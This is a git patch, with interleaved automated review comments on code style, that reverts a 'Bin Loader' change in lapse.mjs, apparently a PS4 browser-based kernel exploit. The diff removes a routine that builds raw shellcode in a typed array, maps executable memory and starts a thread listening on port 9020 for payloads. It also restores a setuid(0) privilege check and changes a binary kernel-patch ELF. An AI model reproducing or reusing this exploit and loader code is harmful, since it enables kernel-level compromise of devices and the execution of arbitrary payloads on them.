From 2abdc1c73f8364438560bee713a3a6e71ac02d3a Mon Sep 17 00:00:00 2001 From: Kameleon <77245601+kmeps4@users.noreply.github.com> Date: Sat, 24 May 2025 13:00:24 -0600 Subject: [PATCH] Revert "Add Bin Loader " --- kpatch/900.elf | Bin 5288 -> 5288 bytes lapse.mjs | 96 ++++++++++++++----------------------------------- 2 files changed, 27 insertions(+), 69 deletions(-) diff --git a/kpatch/900.elf b/kpatch/900.elf index 8e6d0410b8644d6e271d333381ecd8c99f648c0c..a38fa6b29ce522f871cba606f666f29f17bcfd66 100644 GIT binary patch delta 428 zcmZ3Xxk7V7g5d>51~7op3<3~-z|)cx79ewtAcVgLsE!lF-#GC)fBgXu&O;u(T@L^L z|L0dY;Gz2e|G)qIN(YWNP5|ivg0$m}TY=086M&4JV8*e=LqPiVu|}w8uV{7T0UA8%A(6<}ln+UU`E=?{Uwco+cLSAb&Qpkfk0+69O+CI<@23x)t? zp8Ws+zW_+@0n%$GHwwy6ej#YVxMs4VkUZnJ&5lCsjEsJhJ%#l-1EAp;Fu76KoD&|Z YlMf2pi(Y_+^$MsptU#J&vZ%;p0E6af21R!H4m~pJ_5RiU-ysej;1E%E2I%S3l zFORj=Z&L=zI7lloco-fye5{R43anItRe+HRsMw?N(A%Rd3?7}+G=L(<+k||86v*Mn z+pOD4`T~%icu>ZYnE?_KAWtF#W(Fn(4yfl*#hDqvfin57pfh92WJMu)#&w$=h1eMx p*(Q4m>vO_1aZGL$Hs^$g-{gbB_M#ooQ2hWkkrha@PZkxK3;^6zZvp@S diff --git a/lapse.mjs b/lapse.mjs index b176e5e..fb9eb7b 100644 --- a/lapse.mjs +++ b/lapse.mjs @@ -1594,9 +1594,7 @@ async function patch_kernel(kbase, kmem, p_ucred, restore_info) { log('setuid(0)'); sysi('setuid', 0); log('kernel exploit succeeded!'); - localStorage.ExploitLoaded="yes" - sessionStorage.ExploitLoaded="yes" - //alert("kernel exploit succeeded!"); + alert("kernel exploit succeeded!"); } 
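Review bot: The restored `alert("kernel exploit succeeded!");` uses double quotes while the adjacent `log('setuid(0)');` and `log('kernel exploit succeeded!');` lines in the same hunk use single quotes; keep the file's quote style, `alert('kernel exploit succeeded!');`. Note also that `alert()` blocks the script until the dialog is dismissed, so anything scheduled after patch_kernel returns waits on the user; if that is intended, a one-line comment saying so would help the next reader. patch_kernel's body begins outside the hunk.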
@@ -1644,64 +1642,6 @@ function setup(block_fd) {
 return [block_id, groom_ids];
 }
-function malloc(sz) {
- var backing = new Uint8Array(0x10000 + sz);
- nogc.push(backing);
- var ptr = mem.readp(mem.addrof(backing).add(0x10));
- ptr.backing = backing;
- return ptr;
- }
-
- function malloc32(sz) {
- var backing = new Uint8Array(0x10000 + sz * 4);
- nogc.push(backing);
- var ptr = mem.readp(mem.addrof(backing).add(0x10));
- ptr.backing = new Uint32Array(backing.buffer);
- return ptr;
- }
-
-function runBinLoader() {
- var payload_buffer = chain.sysp('mmap', 0x0, 0x300000, 0x7, 0x1000, 0xFFFFFFFF, 0);
- var payload_loader = malloc32(0x1000);
- var BLDR = payload_loader.backing;
- BLDR[0] = 0x56415741; BLDR[1] = 0x83485541; BLDR[2] = 0x894818EC;
- BLDR[3] = 0xC748243C; BLDR[4] = 0x10082444; BLDR[5] = 0x483C2302;
- BLDR[6] = 0x102444C7; BLDR[7] = 0x00000000; BLDR[8] = 0x000002BF;
- BLDR[9] = 0x0001BE00; BLDR[10] = 0xD2310000; BLDR[11] = 0x00009CE8;
- BLDR[12] = 0xC7894100; BLDR[13] = 0x8D48C789; BLDR[14] = 0xBA082474;
- BLDR[15] = 0x00000010; BLDR[16] = 0x000095E8; BLDR[17] = 0xFF894400;
- BLDR[18] = 0x000001BE; BLDR[19] = 0x0095E800; BLDR[20] = 0x89440000;
- BLDR[21] = 0x31F631FF; BLDR[22] = 0x0062E8D2; BLDR[23] = 0x89410000;
- BLDR[24] = 0x2C8B4CC6; BLDR[25] = 0x45C64124; BLDR[26] = 0x05EBC300;
- BLDR[27] = 0x01499848; BLDR[28] = 0xF78944C5; BLDR[29] = 0xBAEE894C;
- BLDR[30] = 0x00001000; BLDR[31] = 0x000025E8; BLDR[32] = 0x7FC08500;
- BLDR[33] = 0xFF8944E7; BLDR[34] = 0x000026E8; BLDR[35] = 0xF7894400;
- BLDR[36] = 0x00001EE8; BLDR[37] = 0x2414FF00; BLDR[38] = 0x18C48348;
- BLDR[39] = 0x5E415D41; BLDR[40] = 0x31485F41; BLDR[41] = 0xC748C3C0;
- BLDR[42] = 0x000003C0; BLDR[43] = 0xCA894900; BLDR[44] = 0x48C3050F;
- BLDR[45] = 0x0006C0C7; BLDR[46] = 0x89490000; BLDR[47] = 0xC3050FCA;
- BLDR[48] = 0x1EC0C748; BLDR[49] = 0x49000000; BLDR[50] = 0x050FCA89;
- BLDR[51] = 0xC0C748C3; BLDR[52] = 0x00000061; BLDR[53] = 0x0FCA8949;
- BLDR[54] = 0xC748C305; BLDR[55] = 0x000068C0; BLDR[56] = 0xCA894900;
- BLDR[57] = 0x48C3050F; BLDR[58] = 0x006AC0C7; BLDR[59] = 0x89490000;
- BLDR[60] = 0xC3050FCA;
-
- chain.sys('mprotect', payload_loader, 0x4000, (0x1 | 0x2 | 0x4));
-
- var pthread = malloc(0x10);
- sysi('mlock', payload_buffer, 0x300000);
-
- call_nze(
- 'pthread_create',
- pthread,
- 0,
- payload_loader,
- payload_buffer
- );
-
- log('GoldHEN Already Loaded, BinLoader Is Ready. Send A Payload To Port 9020 Now');
-}
-
 // overview:
 // * double free a aio_entry (resides at a 0x80 malloc zone)
 // * type confuse a evf and a ip6_rthdr
@@ -1718,16 +1658,14 @@ export async function kexploit() {
 await init();
 const _init_t2 = performance.now();
+ // If setuid is successful, we dont need to run the kexploit again
 try {
- chain.sys('setuid', 0);
- } catch (e) {
- localStorage.ExploitLoaded = "no";
- }
-
- if (localStorage.ExploitLoaded === "yes" && sessionStorage.ExploitLoaded!="yes") {
- runBinLoader();
- return new Promise(() => {});
+ if (sysi('setuid', 0) == 0) {
+ log("Not running kexploit again.")
+ return;
+ }
 }
+ catch (e) {}
 // fun fact:
 // if the first thing you do since boot is run the web browser, WebKit can
@@ -1804,6 +1742,22 @@ export async function kexploit() {
 }
 }
+function malloc(sz) {
+ var backing = new Uint8Array(0x10000 + sz);
+ nogc.push(backing);
+ var ptr = mem.readp(mem.addrof(backing).add(0x10));
+ ptr.backing = backing;
+ return ptr;
+ }
+
+ function malloc32(sz) {
+ var backing = new Uint8Array(0x10000 + sz * 4);
+ nogc.push(backing);
+ var ptr = mem.readp(mem.addrof(backing).add(0x10));
+ ptr.backing = new Uint32Array(backing.buffer);
+ return ptr;
+ }
+
 kexploit().then(() => {
@@ -1828,4 +1782,8 @@ kexploit().then(() => {
 payload_buffer,
 );
+
+
+
+
 })
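Review bot: The `catch (e) {}` closing the new try block swallows every exception from `sysi('setuid', 0)`, not only the expected failure when the process is not yet privileged, so an unrelated fault in the probe is hidden and kexploit() proceeds as if the check had simply failed. Record it before falling through, `catch (e) { log('setuid probe failed: ' + e); }`, so a failed run can be diagnosed from the log. The added `if (sysi('setuid', 0) == 0)` should use `===`, and `log("Not running kexploit again.")` is missing its semicolon and uses double quotes where the surrounding code uses single; the comment's "dont" reads better as "don't". kexploit()'s body continues outside the hunk.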
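Review bot: The re-added `malloc` and `malloc32` are indented inconsistently for top-level declarations — `malloc`'s closing brace and the whole of `malloc32` sit one level in, which reads as if they were nested inside kexploit(). Outdent both to column 0 to match the surrounding file, and consider `const`/`let` in place of `var` as the rest of the module is an ES module. Both read the module-level `nogc` and `mem`, which are outside this hunk; if nothing else calls them now that `runBinLoader` is removed they are dead code, but that cannot be confirmed from the hunk alone.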